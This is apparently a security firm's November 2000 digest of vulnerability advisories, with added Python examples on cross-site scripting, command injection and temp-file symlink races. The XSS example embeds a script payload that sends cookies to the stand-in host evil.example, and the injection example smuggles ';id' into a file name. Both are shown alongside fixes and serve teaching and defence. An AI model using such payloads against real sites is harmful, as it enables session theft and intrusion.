AERAsec
Network Security
Current Security Messages


Most of the links lead directly to the corresponding advisories at CERT or other organisations, so changes made there (which patches to install, which configuration changes avoid a vulnerability) are reflected immediately. Some of the referenced files are served via FTP.

Note: if we do not list a well-known risk inherent in a widely used platform or program, that does not mean this platform or program is safe to use.

Messages for month 11 / 2000

System: FreeBSD and other Unix
Topic: Vulnerability in tcpdump
Links: L-015
ID: ae-200011-050

Tcpdump is a free packet sniffer. It is most commonly used to capture Ethernet packets in a common format that many analysis tools can read, and it is the basis for many intrusion detection applications. Several overflowable buffers were discovered in the version of tcpdump shipped with many operating systems. Some of them merely let a remote attacker crash the local tcpdump process, which is already a problem for systems that rely on tcpdump as a form of intrusion detection. A more serious flaw in the decoding of AFS ACL packets in the more recent tcpdump 3.5 may allow a remote attacker to execute arbitrary code on the local system, usually with root privileges. Patches for FreeBSD are available now.

System: Allaire
Topic: Denial-of-Service in JRun
Links: ASB00-30
ID: ae-200011-049

Under certain circumstances the included JRun 3.0 HTTP servlet server may consume server resources excessively when processing deliberately malformed URIs. If the server is flooded with such requests, this leads to a denial of service. A patch is available for Windows and Unix systems.

System: Microsoft Exchange Server 5.5
Topic: DoS by Malformed MIME Header
Links: MS-082, ERS-2000.271
ID: ae-200011-048

As part of its normal processing of incoming mail, Exchange Server checks the MIME header fields for invalid values. If a particular type of invalid value is present in certain fields, the Exchange service fails, resulting in a denial of service. The issue will be fixed in SP4 for Exchange; a patch is also available.

System: Microsoft Windows NT and 2000
Topic: Buffer Overflow in Network Monitor
Links: ISS-067, MS-083, WinITSec, ISS-69, ERS-2000.279, L-016
ID: ae-200011-047

As reported before, a remotely exploitable buffer overflow was found in one of Network Monitor's protocol parsers. It may allow a remote attacker to gain privileged access and execute arbitrary code on any machine running Network Monitor that displays the captured data. Microsoft has now published patches for Windows NT 4.0 Server, Windows NT 4.0 Server Enterprise Edition, Windows 2000 Server, Advanced Server and Datacenter Server, Systems Management Server 1.2 and Systems Management Server 2.0. The patch for Windows NT 4.0 Server, Terminal Server Edition will be released shortly.

System: Microsoft Windows 2000
Topic: Vulnerability in Indexing Services, Cross-Site Scripting
Links: MS-084, ERS-2000.283
ID: ae-200011-046

A vulnerability could allow a malicious web site operator to misuse another web site as a means of attacking its users, so-called cross-site scripting. It arises when web applications do not properly validate input before using it in dynamically generated pages. If a user loads a page from the malicious site, its operator can "inject" script into a page served by the other web server, which is then delivered to the user; the malicious script thus runs on the user's machine with the trust afforded to the other site. It is recommended to install the patch for Indexing Services under Windows 2000.

System: Microsoft IIS 4.x and 5.x
Topic: Vulnerability caused by Cross-Site Scripting
Links: MS-060
ID: ae-200011-045

This is a re-release of an earlier advisory regarding Internet Information Server. A vulnerability could allow a malicious web site operator to misuse another web site as a means of attacking its users, so-called cross-site scripting. It arises when web applications do not properly validate input before using it in dynamically generated pages. If a user loads a page from the malicious site, its operator can "inject" script into a page served by the other web server, which is then delivered to the user; the malicious script thus runs on the user's machine with the trust afforded to the other site. Microsoft recommends installing the patches for Internet Information Server 4.x and 5.x.
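The mechanism described in the two cross-site scripting entries above (ae-200011-046 and ae-200011-045), as an added example that is not part of this page or of the Microsoft advisories: a constructed search page reflects a query parameter once verbatim and once HTML-escaped. The host names, the parameter name and the payload are assumptions chosen for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request: the attacker's site links the victim to this URL, so the
# "q" parameter is attacker-controlled (example data, not taken from any advisory).
ATTACKER_URL = (
    "http://search.victim.example/results?q="
    "%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2Fc%3F%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url: str, name: str) -> str:
    """Return the decoded value of one query parameter ('' if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get(name, [""])[0]


def render_vulnerable(term: str) -> str:
    """The flaw the advisories describe: input is reflected into the page verbatim,
    so the browser parses the attacker's <script> as part of the trusted site."""
    return f"<html><body><p>Results for: {term}</p></body></html>"


def render_hardened(term: str) -> str:
    """Escape ampersand, angle brackets and both quote characters before reflecting.
    This is the right encoding for HTML text and quoted attribute contexts; a value
    reflected inside a <script> block or a URL needs that context's encoding instead."""
    return f"<html><body><p>Results for: {html.escape(term, quote=True)}</p></body></html>"


def reflects_script(page: str) -> bool:
    """Check used by this example only: does the output contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = query_param(ATTACKER_URL, "q")
    print("vulnerable page carries live script:", reflects_script(render_vulnerable(term)))
    print("hardened page carries live script:  ", reflects_script(render_hardened(term)))
```

The escaping must be applied at output time in the context the value lands in; validating the input alone, as the advisories note, is what the affected servers failed to do.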

System: Microsoft Windows 2000
Topic: Vulnerability caused by ActiveX
Links: MS-085, ERS-2000.284
ID: ae-200011-044

An ActiveX control that ships as part of Windows 2000 contains an unchecked buffer. If the control is called from a web page or HTML mail with a specially malformed parameter, the resulting buffer overrun could cause code to execute on the machine. This could enable a malicious user to take any desired action on the user's machine, limited only by the permissions of the user. Affected are Windows 2000 Server, Professional, Advanced Server and Datacenter Server. It is recommended to install the patch.

System: FreeBSD
Topic: Vulnerabilities in chpass, pine4, boa web server, tcpdump, top, and getnameinfo
Links: FreeBSD, ERS-2000.273, ERS-2000.274, ERS-2000.275, ERS-2000.276, ERS-2000.277, ERS-2000.278
ID: ae-200011-043

A format string vulnerability was discovered in code used by the vipw utility. vipw itself does not run with increased privileges, but the code is shared with other utilities, namely chfn, chpass, chsh, ypchfn, ypchpass, ypchsh and passwd, which do run setuid root, so a local root exploit is possible. The pine4 port, versions 4.21 and before, contains a buffer overflow that allows a remote user to execute arbitrary code on the local client by sending a specially crafted email message. The boa port, versions after 0.92 but prior to 0.94.8.3, allows remote users to view arbitrary files outside the document root because boa does not correctly restrict URL-encoded requests containing ".." in the path. Several overflowable buffers were discovered in the version of tcpdump included in FreeBSD. A format string vulnerability in the top(1) utility allows unprivileged local users to make the top process execute arbitrary code. An off-by-one error in the processing of DNS hostnames allows a long DNS hostname to crash the getnameinfo() function when the hostname is resolved. Patches are available now.

System: Red Hat Linux 5.x, 6.x, 7.0
Topic: Vulnerabilities in nss_ldap, gnorpm, dump, pine, and imap
Links: RHSA-2000:024, RHSA-2000:072, RHSA-2000:100, ERS-2000.272, ERS-2000.281, ERS-2000.282, RHSA-2000:102, ERS-2000.288
ID: ae-200011-042

A race condition has been found in the nss_ldap package: on a system running nscd, an attacker can cause the system to hang. A locally exploitable hole in GnoRPM's temporary file handling lets a normal user trick root running GnoRPM into writing to arbitrary files. The dump package from Red Hat 7.0 is being released for Red Hat 6.x and 5.x in order to remove the setuid root bits and so prevent a known dump exploit. By adding specific headers to messages, the pine mail reader and the imap server could be made to exit with an error message when users attempted to manipulate mail folders containing those messages.

System: HP-UX
Topic: Vulnerability in dtterm
Links: HP Security Bulletin #00128, ERS-2000.280, L-017
ID: ae-200011-041

Due to a security hole in dtterm, users may gain unauthorized privileges on HP9000 systems running HP-UX releases 11.00, 11.04, 10.20, 10.24 and 10.10. Hewlett Packard has published patches:

System       Patch-ID
HP-UX 10.10  not available yet
HP-UX 10.24  PHSS_22546
HP-UX 10.20  PHSS_22319
HP-UX 11.04  PHSS_22548
HP-UX 11.00  PHSS_22320

System: Linux Mandrake
Topic: Vulnerability in nss_ldap
Links: MDKSA-2000:066
ID: ae-200011-040

A race condition exists in versions of nss_ldap prior to version 121: on a system running nscd, a malicious user can cause the system to hang. A patch is available now.

System: Microsoft IIS 5.0 and 4.0
Topic: Vulnerability caused by Web Server File Request Parsing
Links: MS-086, L-018, ERS-2000.285, L-018a, ERS-2000.303
ID: ae-200011-039

When Internet Information Server receives a valid request for an executable file, it passes the name of the requested file to the underlying operating system for processing. Due to an implementation flaw in IIS 5.0 and 4.0, it is possible to craft a specially malformed file request that contains both a file name and one or more operating system commands. IIS passes the entire string to the operating system, which first processes the file and then executes the commands, so arbitrary commands can be executed on the system IIS runs on. A patch for IIS 5.0 is available in English, German, Japanese, Simplified Chinese and Traditional Chinese. Microsoft has updated the advisory and points to the latest patch for IIS 4.0 and IIS 5.0.
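A generic illustration of the class of flaw in ae-200011-039, added here and not taken from the Microsoft advisory: in the flawed version a requested file name is concatenated into a command line that a shell will parse, in the hardened version it is first validated as a single plain file name with an allowed extension and then handed over as an argv list with no shell in between. The scripts directory, the allowed extensions and the two request strings are assumptions; nothing is executed.

```python
import re
from pathlib import PurePosixPath

SCRIPT_ROOT = PurePosixPath("/srv/www/scripts")   # assumed location of executable scripts
ALLOWED_EXT = {".cgi", ".sh"}                      # assumed allow-list of executable types

# One plain path component: letters, digits, dot, dash, underscore, not starting
# with a dot. This excludes every shell metacharacter (& | ; ` $ < > space ...),
# every path separator and the "." / ".." components.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def build_command_flawed(interpreter: str, requested: str) -> str:
    """Flawed pattern: the request is spliced into a command line that a shell will
    parse, so metacharacters in `requested` turn into additional commands."""
    return f"{interpreter} {SCRIPT_ROOT}/{requested}"


def build_command_hardened(interpreter: str, requested: str) -> list[str]:
    """Validate, then return an argv list for execve-style invocation (no shell)."""
    if not SAFE_NAME.fullmatch(requested):
        raise ValueError(f"rejected request name: {requested!r}")
    target = SCRIPT_ROOT / requested
    if target.suffix.lower() not in ALLOWED_EXT:
        raise ValueError(f"not an allowed executable type: {requested!r}")
    if target.parent != SCRIPT_ROOT:   # cannot trigger given SAFE_NAME; kept as a second line of defence
        raise ValueError("request escaped the script root")
    return [interpreter, str(target)]


# Constructed requests: a legitimate one and one smuggling a command after a metacharacter.
GOOD_REQUEST = "report.cgi"
BAD_REQUEST = "report.cgi;id"

if __name__ == "__main__":
    print("flawed  :", build_command_flawed("/bin/sh", BAD_REQUEST))
    print("hardened:", build_command_hardened("/bin/sh", GOOD_REQUEST))
    try:
        build_command_hardened("/bin/sh", BAD_REQUEST)
    except ValueError as exc:
        print("hardened:", exc)
```

The argv list is what a subprocess API without a shell (execve, CreateProcess with a fixed program path) consumes; the allow-list on the name is what keeps the validation independent of whichever metacharacters a particular shell happens to honour.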

System: Microsoft Windows NT Terminal Server
Topic: Vulnerability caused by Login Buffer Overflow
Links: MS-087, WinITSec, ERS-2000.286
ID: ae-200011-038

An unchecked buffer in the Terminal Server login prompt could allow an attacker to make the Terminal Server execute arbitrary code, including adding, changing or deleting data, running code already on the server, or uploading new code to it. The attacker would not need to log in to the Terminal Server successfully, whether remotely or directly. The vulnerability can only be exploited remotely if connection requests are not filtered; by default Terminal Server listens on TCP port 3389. It is recommended to block this port towards the Internet and to install the patch published by Microsoft.

System: Several systems
Topic: New ISS Summary
Links: ISS
ID: ae-200011-037

Within the last month, 103 (!) new vulnerabilities were found:

- linux-dump-execute-code - ultraseek-malformed-url-dos - allaire-jrun-servlet-dos
- ms-exchange-mime-dos - ewave-servletexec-file-upload - ewave-servletexec-dos
- samba-swat-brute-force - samba-swat-url-filename-dos - ftp-servu-brute-force
- samba-swat-logging-sym-link - samba-swat-logfile-info - pagelog-cgi-dir-traverse
- kw-whois-meta - iis-htw-cross-scripting - bftpd-user-bo
- nssldap-nscd-dos - news-update-bypass-password - iplanet-netscape-directory-traversal
- cisco-catalyst-remote-commands - tisfwtk-xgw-execute-code - iplanet-netscape-plaintext-password
- global-execute-remote-commands - cisco-vco-snmp-passwords - cyrus-sasl-gain-access
- iplanet-web-server-shtml-bo - pammysql-auth-input - iplanet-web-server-shtml-bo
- ntop-filename-bo-root - hotjava-browser-dom-access - allaire-jrun-webinf-access
- sun-compromised-certificate - allaire-jrun-ssifilter-url - allaire-jrun-jsp-execute
- halflife-rcon-format-string - ntop-i-bo - session-cookie-remote-retrieval
- avirt-mail-from-dos - avirt-rcpt-to-dos - hp-crontab-read-files
- pollit-admin-password-var - mysql-authentication - win-msiexec-reg-perm
- antivirus-nav-restore-directory - cisco-ios-query-dos - oracle-log-files-created
- oracle-home-bo - intel-email-username-bo - lpr-print-filters-execute
- ping-buf-bo - broker-ftp-username-dos - win-hyperterminal-telnet-bo
- ypbind-printf-format-string - oracle-oidldap-bo - vm-java-codebase-exe
- iis-unicode-translation - auction-weaver-delete-files - auction-weaver-username-bidfile
- wingate-view-files - hp-lpspooler-bo - cmd5checkpw-qmail-bypass-authentication
- halflife-server-changelevel-bo - netmeeting-desktop-sharing-dos - curl-error-bo
- winu-backdoor - freebsd-fingerd-files - win9x-share-level-password
- hp-virtualvault-nsapi-dos - communigate-email-verify - win-netbios-driver-type-dos
- php-logging-format-string - ie-cache-info - gnupg-message-modify
- netscape-messaging-email-verify - win-nmpi-packet-dos - hp-jetdirect-firmware-dos
- hp-jetdirect-ip-implementation - boa-webserver-config-cgi-exe - shambala-connection-dos
- extropia-webstore-fileread - shambala-password-plaintext - hassan-shopping-cart-dir-traversal
- web-shopper-directory-traversal - phpix-dir-traversal - icq-webfront-url-dos
- boa-webserver-get-dir-traversal - uclinux-apliophone-bin-execute - bsd-arp-request-dos
- word-mail-merge - linux-talkd-overwrite-root - aim-file-transfer-dos
- iis-index-dir-traverse - bsd-photurisd-format - bsd-eeprom-format
- bsd-fstat-format - bsd-libutil-format - winnt-invalid-lpc-request
- lpc-memory-consumption - spoofed-lpc-port-variant - linux-tmpwatch-fuser
- pegasus-file-forwarding - acme-thttpd-ssi - gnorpm-temp-symlink
- moreover-cgi-dir-traverse

System: HP-UX
Topic: Vulnerabilities in Aserver and MC/ServiceGuard
Links: HP Security Bulletin #00129, ERS-2000.287, S-00-49
ID: ae-200011-036

As reported before, a procedure to use /opt/audio/bin/Aserver to gain root access has been made public. In addition, the MC/ServiceGuard file and directory permissions are incorrect, which may lead to a denial of service. Affected are HP-9000 machines. It is recommended to install the relevant patches:

System       Patch-ID
HP-UX 10.xx  PHSS_21662
HP-UX 11.00  PHSS_21663, PHSS_22540
HP-UX 11.11  PHSS_22540

System: Linux Mandrake
Topic: Vulnerability in bind
Links: MDKSA-2000:067
ID: ae-200011-035

A vulnerability exists in the bind name server's handling of compressed zone transfers. It can be triggered by authorized zone transfers and used in a DoS attack: the named daemon will crash if it receives such a zone transfer from an authorized source address. The crash is not necessarily immediate but can occur anywhere from a few seconds to a few minutes after the attack. The new bind version also fixes a bug in the handling of compression pointer tables that can cause the name server to enter an infinite loop; this bug has been known to occur during normal processing of the SRV records used by Windows 2000 Active Directory. Updates are available now.

System: Microsoft IE 5.x, Outlook and Outlook Express, Windows 2000 with Index Server
Topic: Vulnerability caused by ActiveX
Links: WinITSec
ID: ae-200011-034

As Georgi Guninski reports, the "ixsso.query" ActiveX object in the mentioned products gives an attacker the possibility of unauthorized file searching. A demonstration is available, but no patch yet.

System: Red Hat Linux 5.x, 6.x, 7.0
Topic: DoS in BIND
Links: RHSA-2000:107
ID: ae-200011-033

Several possibilities for a denial of service were found in BIND, the most widely used name server (named).

System: Linux Mandrake
Topic: Vulnerabilities in bind, openssh, and tcsh
Links: MDKSA-2000:067, MDKSA-2000:068, MDKSA-2000:069
ID: ae-200011-032

Several possibilities for a DoS were found in BIND. A vulnerability exists in all versions of OpenSSH prior to 2.3.0 with regard to X11 forwarding and ssh-agent: although the client does not request these features during session setup when agent or X11 forwarding is disabled in its configuration, a malicious server can nevertheless force the client to enable them. Another vulnerability exists in tcsh when using here documents with the << syntax: tcsh stores the data in a temporary file which is not created securely, so standard symlink attacks can be used to make tcsh overwrite arbitrary files. Patches are available now.

System: OpenLinux
Topic: Vulnerability in bind
Links: CSSA-2000-040
ID: ae-200011-031

Several possibilities for a DoS were found in BIND. Caldera has published the corresponding patches.

System: Debian Linux
Topic: Vulnerabilities in gnupg, tcsh, and bind
Links: Debian201111, Debian201111a, Debian201112
ID: ae-200011-030

The version of gnupg distributed in Debian GNU/Linux 2.2 has a logic error in the code that checks for valid signatures, which can cause false positive results. Tcsh does not handle here documents correctly, so it is possible to overwrite arbitrary files on the system. In BIND, several possibilities for a successful denial of service were found. Patches are available now.

System: many Unix
Topic: Multiple Denial-of-Service Problems in ISC BIND
Links: CA-2000-20, L-019, S-00-50
ID: ae-200011-029

Systems running Internet Software Consortium (ISC) BIND versions 8.2 through 8.2.2-P6, or name servers derived from them, have several holes that can be exploited for a DoS. It is strongly recommended to update to BIND 8.2.2-P7 or BIND 9.0.1. Further information about the security holes can be found in the advisory.

System: Rideway PN
Topic: Problem causes Denial-of-Service
Links: WinITSec
ID: ae-200011-028

Rideway PN V6.22 is a proxy application for Windows. As Strumpf Noir Society reports, it is vulnerable to a DoS attack: if the Telnet proxy is enabled and listening on port 23 (the default Telnet port), an attacker can cause all proxy services to become unavailable. A patch is not available yet, but a demonstration is shown in the advisory.

System: Linux Mandrake
Topic: Vulnerabilities in cups and modutils
Links: MDKSA-2000:070, MDKSA-2000:071
ID: ae-200011-027

In Linux Mandrake 7.2 two problems in CUPS were found: CUPS printers are accessible from anywhere on the Internet, and a bug makes CUPS broadcast everywhere, keeping dial-on-demand lines open. All 2.3.x versions of modutils (since March 12, 1999) contain a vulnerability that can lead to a local root compromise. Patches are available now.

System: FreeBSD
Topic: Vulnerabilities in ncurses, telnet and ppp
Links: FreeBSD, ERS-2000.289, ERS-2000.290, S-00-51, S-00-52, S-00-53
ID: ae-200011-026

A vulnerability was found in ncurses: an overflowable buffer in the libncurses library's processing of cursor movement may allow an attacker to execute arbitrary code on the local system with the privileges of the exploited binary. The telnet protocol allows UNIX environment variables to be passed from the client to the user's login session on the server; however, some of these environment variables have special meaning to the telnetd child process itself and may be used to affect its operation, so an attacker may be able to consume resources on the target system.
The ppp(8) utility includes network address translation functionality for translating between public and private IP address ranges, using the libalias library. Users who rely on the deny_incoming option in the expectation that it provides a "deny by default" firewall, letting through only packets known to belong to an existing NAT session, are in fact allowing other types of unsolicited IP traffic into their internal network. Patches are available now.

System: Microsoft Exchange 2000 Server
Topic: Backdoor by Known User Account
Links: MS-088, ERS-2000.291, WinITSec
ID: ae-200011-025

In early shipments of Exchange 2000, setup creates an account with a known user name and password. Under normal circumstances this account only grants local user-level access, but where Exchange is installed on a Domain Controller, anyone who discovers the credentials could obtain domain-wide access. Microsoft has provided a patch to fix this problem.

System: Red Hat Linux 5.x, 6.x, 7.0
Topic: Vulnerability in modutils, Netscape, and joe
Links: RHSA-2000:108, ERS-2000.292, ERS-2000.293, RHSA-2000:109, ERS-2000.294, RHSA-2000:110, ERS-2000.300, L-020, ERS-2000.309, ERS-2000.311, L-022
ID: ae-200011-024

Modutils, a package that helps the kernel load kernel modules (device drivers etc.) automatically when they are needed, could be abused to execute code as root. An HTML buffer overflow in Netscape Communicator has been found and fixed. When joe exits in a non-standard way (such as a system crash, closing an xterm, or a network connection going down), it unconditionally appends its open buffers to the file "DEADJOE". This can be exploited by creating DEADJOE symlinks in directories where root would normally use joe; joe can then be used to append garbage to potentially sensitive files, resulting in a denial of service.

System: CA Inoculate IT for Exchange Server
Topic: Denial-of-Service possible
Links: WinITSec 
ID: ae-200011-023

It is possible to make the AntiVirus agent fail when two separate Microsoft Exchange servers, both running Computer Associates InoculateIT for Exchange, communicate via the Microsoft Internet Mail Connector (IMC). There are multiple ways to accomplish this; further information can be found in the advisory. A patch has not been released yet.

System: Debian Linux
Topic: Vulnerabilities in ssh, cron, and cupsys
Links: Debian201118, Debian201118a, Debian201119
ID: ae-200011-022

In Secure Shell (ssh), the remote ssh server can force the ssh client to enable agent and X11 forwarding when the connection is established. Several problems in Vixie Cron, including insecure permissions on temporary files and race conditions in their deletion, allow attacks ranging from denial of service to privilege escalation. CUPS has a rather vague problem to the effect of "everyone on the Internet can get to your printers". Debian has published fixes that should be installed soon.

System: Microsoft IIS 4.x and 5.x
Topic: Vulnerability in Session ID Cookie Marking
Links: MS-080
ID: ae-200011-021

As reported before, there is a vulnerability in the use of Session ID cookies (encrypted and plain text) with ASP pages. Microsoft has now published a new patch for IIS 4.0 on x86 platforms (Alpha on request from Microsoft) and for IIS 5.0.

System: HP-UX
Topic: Vulnerability in auto_parms
Links: HP Security Bulletin #00130, S-00-54, ERS-2000.302
ID: ae-200011-020

A security vulnerability was found in auto_parms and set_parms on HP9000 Series 700/800 systems running HP-UX releases 10.xx and 11.xx. It may allow remote users to gain root access or to disrupt normal operations. It is recommended to install the following patches:

System       Patch
HP-UX 10.01  PHCO_21990
HP-UX 10.10  PHCO_21991
HP-UX 10.20  PHCO_21992
HP-UX 10.24  PHCO_22185
HP-UX 11.00  PHCO_21993
HP-UX 11.04  PHCO_22186

System:
Topic: New CERT-Summary
Links: CS-2000-04
ID: ae-200011-019

CERT has published a summary pointing out recent trends in security issues. The following were the most frequently used exploits:
- Compromises Via an Input Validation Vulnerability in rpc.statd
- Compromises Via the 'SITE EXEC' Vulnerability in FTPd
- Compromises Via a Vulnerability in the IRIX Telnet Daemon
- VBS/Loveletter.AS Worm
- QAZ Worm
- Multiple Denial of Service Problems in ISC BIND

System: FreeBSD
Topic: Vulnerabilities in mgetty, curl, thttpd, mod_php3/mod_php4, tcsh, 44bsd-csh, and ncurses
Links: FreeBSD, ERS-2000.295, ERS-2000.296, ERS-2000.297, ERS-2000.298, ERS-2000.299, ERS-2000.301
ID: ae-200011-018

By exploiting a hole in mgetty, local users may create or overwrite any file on the system. The curl port allows a client-side exploit through a buffer overflow in its error handling code. The thttpd port allows remote viewing of arbitrary files on the local server: the 'ssi' CGI script does not correctly restrict URL-encoded requests containing ".." in the path. The mod_php ports contain a potential vulnerability that may allow a remote attacker to execute arbitrary code as the user running the web server. The csh and tcsh code creates temporary files when the '<<' operator is used, but these are created insecurely with a predictable filename based on the process ID of the shell; an attacker can exploit this to overwrite an arbitrary file writable by the user running the shell. There is also an overflowable buffer in the libncurses library's processing of cursor movement capabilities. Patches are available now.

System: Microsoft Windows 2000, SP1
Topic: Vulnerability by Domain Account Lockout
Links: MS-089, ERS-2000.304, WinITSec
ID: ae-200011-017

A flaw in the way NTLM authentication operates in Windows 2000 could allow a domain account lockout policy to be bypassed on a local Windows 2000 machine, even if the domain administrator has set such a policy. A malicious user's ability to avoid the lockout policy increases the threat from a brute-force password-guessing attack. The vulnerability only affects Windows 2000 machines that are members of non-Windows 2000 domains, and only domain user accounts that have previously logged into the target machine and therefore have cached credentials there. Microsoft has published a patch.

System: Open Linux
Topic: Two vulnerabilities in ghostscript
Links: CSSA-041
ID: ae-200011-016

Caldera reports two new problems in ghostscript: temporary files are created insecurely, and the program is linked in a way that makes it pick up shared libraries from the current directory. Both problems can give increased privilege on the system. Patches are available.

System: Debian Linux
Topic: Vulnerabilities in modutils, tcpdump, ncurses, xmcd, cddb, joe, and ethereal
Links: Debian201120, Debian201120a, Debian201121, Debian201121a, Debian201122, Debian201122a, Debian201122c
ID: ae-200011-015

Local users can run arbitrary commands as root if the machine is running a kernel with kmod enabled; another problem was found in the handling of parameters passed to modprobe. Tcpdump may crash when carefully crafted packets are sent to a network being monitored with tcpdump. The version of the ncurses display library shipped with Debian GNU/Linux 2.2 is vulnerable to several buffer overflows; since the "cda" binary is linked against ncurses, this allows a root exploit. Two setuid helpers for accessing CDDB databases and SCSI CD-ROM drives, xmcd and cddb, are vulnerable. The DEADJOE problem in joe (see above) is present in Debian as well. An attacker can trigger some overflows in ethereal by sending carefully crafted packets to a network being monitored by it. Patches are available now.

System: HP-UX
Topic: Vulnerability in EMS
Links: HP Security Bulletin #00131, ERS-2000.305
ID: ae-200011-014

A defect in the Event Monitoring System (EMS) version A.03.00 allows users to change file permissions on any file in the root partition. This affects the ServiceGuard OPS edition as well as MC/ServiceGuard. It is recommended to migrate to EMS A.03.20.

System: Linux Mandrake
Topic: Vulnerabilities in gnome-media, joe, pine, and ghostscript
Links: MDKA-2000:016, MDKSA-2000:072, MDKSA-2000:073, MDKSA-2000:074
ID: ae-200011-013

A problem exists with the gmix program in the gnome-media package. When joe exits in a non-standard way (such as a system crash, closing an xterm, or a network connection going down), it unconditionally appends its open buffers to the file DEADJOE, which may corrupt files knowingly or unknowingly. By adding specific headers to messages, the pine mail reader could be made to exit with an error message when users attempted to manipulate mail folders containing those messages. The ghostscript package uses mktemp instead of mkstemp to create temporary files, and it uses an improper LD_RUN_PATH value which causes it to search for libraries in the current directory. Patches are available now.

System: Microsoft Windows Media Player 6.4 and 7
Topic: Vulnerabilities caused by .ASX Buffer Overrun and .WMS Script Execution
Links: MS-090, WinITSec, ERS-2000.306
ID: ae-200011-012

Two independent vulnerabilities have been found in the Windows Media Player:
1) Windows Media Player supports the use of Active Stream Redirector (.ASX) files to enable users to play streaming media that resides on intranet or Internet sites. The code that parses .ASX files has an unchecked buffer, and this could potentially enable an attacker to run code of his choice on the machine of another user. 
2) Windows Media Player 7 introduced a feature called "skins", that allows customization of the look and feel of Windows Media Player. A custom skin (.WMS) file could potentially include script, which would execute if Windows Media Player was run and that skin was selected. An attacker could either send a customized skin containing script to another user and try to entice her into using it, or he could host such a file on a web site and cause it to launch automatically whenever a user visited the site. Because the code would reside on the user's local machine, it would be able to execute ActiveX controls, including ones not marked "safe for scripting". This would enable the code to take any action that can be accomplished via an ActiveX control.
It's strongly recommended to install the patches for Windows Media Player 6.4 and Windows Media Player 7, respectively.

System: Debian Linux
Topic: Vulnerabilities in ghostscript
Links: Debian201123
ID: ae-200011-011

The way ghostscript uses temporary files is insecure: mktemp is used to create a name for a temporary file, but the file is not opened safely. Another problem is that during the build the LD_RUN_PATH environment variable was set to the empty string, which causes the dynamic linker to look in the current directory for shared libraries. A patch is available now.

System: Red Hat Linux 5.x, 6.x, 7.0
Topic: Vulnerabilities in openssh and ghostscript
Links: RHSA-2000:111, RHSA-2000:114
ID: ae-200011-010

An OpenSSH client will do agent or X11 forwarding at the request of a server even if the user has not asked for it; a malicious server can exploit this to gain access to the user's display. ghostscript used mktemp to create temporary files, an insecure and predictable approach; it is now patched to use mkstemp, which avoids the race condition on the name.

System: Linux Mandrake
Topic: Vulnerabilities in modutils, userdrake, and pine
Links: MDKSA-2000:071, MDKA-2000:017, MDKSA-2000:073
ID: ae-200011-009

All 2.3.x versions of modutils (since March 12, 1999) contain a vulnerability that can lead to a local root compromise. The userdrake package has a serious problem on systems where shadow passwords are not used. By adding specific headers to messages, the pine mail reader could be made to exit with an error message when users attempted to manipulate mail folders containing those messages. Patches are available now.

System: OpenLinux
Topic: Vulnerability in bash
Links: CSSA-2000-042
ID: ae-200011-008

As Caldera reports, bash creates temporary files for here documents insecurely. This can be exploited via a symlink attack to create or overwrite arbitrary files on the system if the shell is run by root. A patch is available now.

System: Red Hat Linux 5.x, 6.x, 7.0
Topic: Vulnerabilities in ncurses and bash
Links: RHSA-2000:115, RHSA-2000:117, ERS-2000.307, ERS-2000.312
ID: ae-200011-007

There was an overflowable buffer in the part of the ncurses library that handles cursor movement. The "<<" operator in bash 1.x used predictable temporary filenames, leading to a potential denial of service attack.
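The temporary-file flaw shared by the tcsh/csh and bash here-document entries (ae-200011-032, ae-200011-018, ae-200011-008 and ae-200011-007) and by the ghostscript entries (ae-200011-011 and ae-200011-010) is the same race: a name an attacker can predict is opened without O_EXCL, so a symlink planted at that name redirects the write. This added example, not code from any of the patched programs, replays that attack against a PID-based name in a scratch directory and then shows the two fixes the advisories name, opening with O_CREAT|O_EXCL and using mkstemp. The file names and contents are constructed; the calls map one-to-one onto the open(2) and mkstemp(3) calls in the C programs.

```python
import os
import tempfile
from pathlib import Path


def predictable_name(directory: str) -> str:
    """Name pattern of the kind the csh/tcsh and bash 1.x here-document code used: prefix + PID."""
    return os.path.join(directory, f"sh{os.getpid()}")


def write_insecure(path: str, data: str) -> None:
    """mktemp-style: the name was chosen earlier and open(2) is called with
    O_CREAT|O_TRUNC but without O_EXCL, so a symlink already at `path` is followed."""
    with open(path, "w") as f:
        f.write(data)


def write_excl(path: str, data: str) -> bool:
    """Fix 1: O_EXCL makes open(2) fail with EEXIST if anything, including a symlink,
    already exists at `path`. Returns False when the write was refused."""
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        return False
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return True


def write_mkstemp(directory: str, data: str) -> str:
    """Fix 2: mkstemp(3) picks an unpredictable name and opens it with O_EXCL in one
    step, so there is no window between choosing the name and creating the file."""
    fd, path = tempfile.mkstemp(prefix="sh", dir=directory)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def run_scenario() -> dict:
    """Plant a symlink at the predictable name, then try all three writers against it."""
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim.conf")   # constructed file the attacker wants clobbered
        Path(victim).write_text("secret=1\n")
        target = predictable_name(d)
        os.symlink(victim, target)                # the attacker's move, made before the shell runs

        write_insecure(target, "garbage\n")
        after_insecure = Path(victim).read_text()

        excl_accepted = write_excl(target, "more garbage\n")
        after_excl = Path(victim).read_text()

        safe_path = write_mkstemp(d, "safe\n")
        after_mkstemp = Path(victim).read_text()

        return {
            "victim_after_insecure": after_insecure,        # "garbage\n": the symlink was followed
            "excl_accepted": excl_accepted,                 # False: O_EXCL refused the planted link
            "victim_after_excl": after_excl,                # unchanged
            "mkstemp_used_predictable_name": safe_path == target,   # False: name not guessable
            "victim_after_mkstemp": after_mkstemp,          # unchanged
        }


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value!r}")
```

O_EXCL alone is enough when the program owns the name; mkstemp additionally removes the predictability, which is why the ghostscript fix replaced mktemp with it rather than just adding a flag. Neither helps a program that later reopens the file by name; keep using the descriptor.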

System: Sun Microsystems
Topic: Vulnerability in JDK/JRE
Links: Sun Security Bulletin #00199, ERS-2000.313, ERS-2000.315
ID: ae-200011-006

Under certain circumstances the Java Runtime Environment may allow an untrusted Java class to call into a disallowed class, a potential security issue. Patches are available now.

